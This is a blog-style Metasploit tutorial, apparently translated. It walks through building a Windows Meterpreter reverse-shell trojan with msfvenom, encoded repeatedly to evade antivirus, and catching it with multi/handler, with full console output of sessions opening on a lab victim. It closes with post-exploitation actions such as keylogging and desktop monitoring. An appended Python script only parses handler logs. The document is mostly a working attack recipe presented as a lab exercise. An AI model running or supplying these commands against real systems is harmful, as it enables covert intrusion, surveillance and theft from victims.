Metasploit is an open source vulnerability detection and exploitation tool that helps security and IT professionals identify security issues, validate vulnerability mitigation measures, and manage expert-driven security assessments to provide real security risk intelligence.
Features: its modular design integrates payload handlers, encoders, NOP generators, and exploits, which makes the Metasploit Framework a way to study high-risk vulnerabilities. It integrates common overflow vulnerabilities and popular shellcode for many platforms, and is constantly updated. The latest version of MSF contains more than 750 exploits for popular operating systems and application software, as well as 224 shellcodes. As a security tool, it plays a role in security testing, and it provides a strong guarantee for automatically detecting vulnerabilities and detecting system vulnerabilities in a timely manner.
Metasploit ships with hundreds of exploits, and you can also see how an exploit is built in its online exploit generation demo. This makes it much easier to write an exploit, which is bound to raise the level of illegal shellcode and widen the dark side of the network. Comparable professional exploitation tools such as Core Impact and Canvas have long been used by professional users; Metasploit lowered the barrier to use and brought this capability to the public.
Let's start with a simple and interesting little experiment.
Attacker machine: Kali Linux 2018.1, the latest version (the installation ran into a lot of snags), IP: 172.16.221.243
Victim: Windows 7, IP: 172.16.221.153
1. First, generate the Trojan file
(1) msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=172.16.221.243 LPORT=12315 -f exe > /root/muma.exe
msfvenom is used to generate the Trojan file
-p, --payload <payload>    Specify the payload to use (the attack payload)
msfvenom -l payloads    List all available payloads
windows/meterpreter/reverse_tcp    The payload we chose to use
-e, --encoder <encoder>    Specify the encoder to use
msfvenom -l encoders    List the available encoders
x86/shikata_ga_nai    The encoder we chose (for AV evasion)
-i 5, --iterations <count>    Encode the payload 5 times (more iterations, higher chance of evading AV)
LHOST    Specify the IP address to connect back to
LPORT    Specify the listening port; it can be changed to any value
-f, --format <format>    Specify the output format (use --help-formats to get the list of output formats MSF supports)
/root/muma.exe    The path the generated file is written to
2. Move the Trojan file to the victim host
3. I am using the graphical Armitage directly, to make the following steps easier
(1) Type use exploit/multi/handler and press Enter
(2) msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    Select this attack payload
payload => windows/meterpreter/reverse_tcp    This echoed line proves we have switched to this payload
(3) msf exploit(multi/handler) > show options    View the configuration of this payload
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.221.243   yes       The listen address
   LPORT     18609            yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

(echoed output)
(4) msf exploit(multi/handler) > set LPORT 12315    Change it to the listening port set when the Trojan file was generated
LPORT => 12315    (echoed output proving the change succeeded)
(5) msf exploit(multi/handler) > show options    View the payload configuration again

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.221.243   yes       The listen address
   LPORT     12315            yes       The listen port    (see here that the port has changed)

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
(6) msf exploit(multi/handler) > exploit    Run it (don't forget to run the Trojan file on the victim host)
[*] Started reverse TCP handler on 172.16.221.243:12315
[*] Sending stage (179779 bytes) to 172.16.221.153
[*] Meterpreter session 9 opened (172.16.221.243:12315 -> 172.16.221.153:50596) at 2018-04-27 15:17:12 +0800
[*] Meterpreter session 11 opened (172.16.221.243:12315 -> 172.16.221.153:50679) at 2018-04-27 15:37:31 +0800
Seeing the output above means it succeeded.
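As an added example (not part of the original post or of Metasploit itself), here is a small Python parser for handler output in the format shown above: it pulls out the listener address and every session that opened, lists the victim hosts that called back, and flags sessions whose listener does not match the handler you expected (the LPORT mismatch that steps (4) and (5) fix). The log lines are constructed to match the format above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample, in the same format as the msfconsole handler output above.
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 172.16.221.243:12315
[*] Sending stage (179779 bytes) to 172.16.221.153
[*] Meterpreter session 9 opened (172.16.221.243:12315 -> 172.16.221.153:50596) at 2018-04-27 15:17:12 +0800
[*] Meterpreter session 11 opened (172.16.221.243:12315 -> 172.16.221.153:50679) at 2018-04-27 15:37:31 +0800
"""

HANDLER_RE = re.compile(r"^\[\*\] Started reverse TCP handler on (?P<host>[\d.]+):(?P<port>\d+)$")
SESSION_RE = re.compile(
    r"^\[\*\] Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})$",
    re.IGNORECASE,
)


@dataclass
class Session:
    sid: int
    listener: str    # LHOST:LPORT the victim connected back to
    victim: str      # victim IP and its ephemeral source port
    opened_at: str


def parse_handler_log(text: str) -> Tuple[Optional[str], List[Session]]:
    """Return the handler's LHOST:LPORT (None if never started) and the sessions that opened."""
    listener: Optional[str] = None
    sessions: List[Session] = []
    for line in text.splitlines():
        m = HANDLER_RE.match(line)
        if m:
            listener = f"{m['host']}:{m['port']}"
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.append(Session(int(m["sid"]), f"{m['lhost']}:{m['lport']}",
                                    f"{m['rhost']}:{m['rport']}", m["ts"]))
    return listener, sessions


def victim_hosts(sessions: List[Session]) -> List[str]:
    """Distinct victim IPs in first-seen order (which hosts actually called back)."""
    seen: List[str] = []
    for s in sessions:
        ip = s.victim.split(":")[0]
        if ip not in seen:
            seen.append(ip)
    return seen


def mismatched_sessions(expected_listener: str, sessions: List[Session]) -> List[Session]:
    """Sessions that came in on a listener other than the one configured, e.g. a wrong LPORT."""
    return [s for s in sessions if s.listener != expected_listener]
```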
4. As mentioned, the graphical interface makes things convenient; next, a few small operations
Once the host appears in Armitage, it can be operated on.
Right-clicking the host shows the available actions
Run some shell commands; I suggest running them from the Meterpreter shell. The other shell commands did not run when I did the experiment
getuid: obtain the UID
sysinfo: view system information
run vnc: open VNC
getdesktop: remotely monitor the desktop
Browse files: browse the directory
Keylogger: everyone knows what that does
That's basically it for these little operations.
Metasploit: generating a Trojan and getting a reverse shell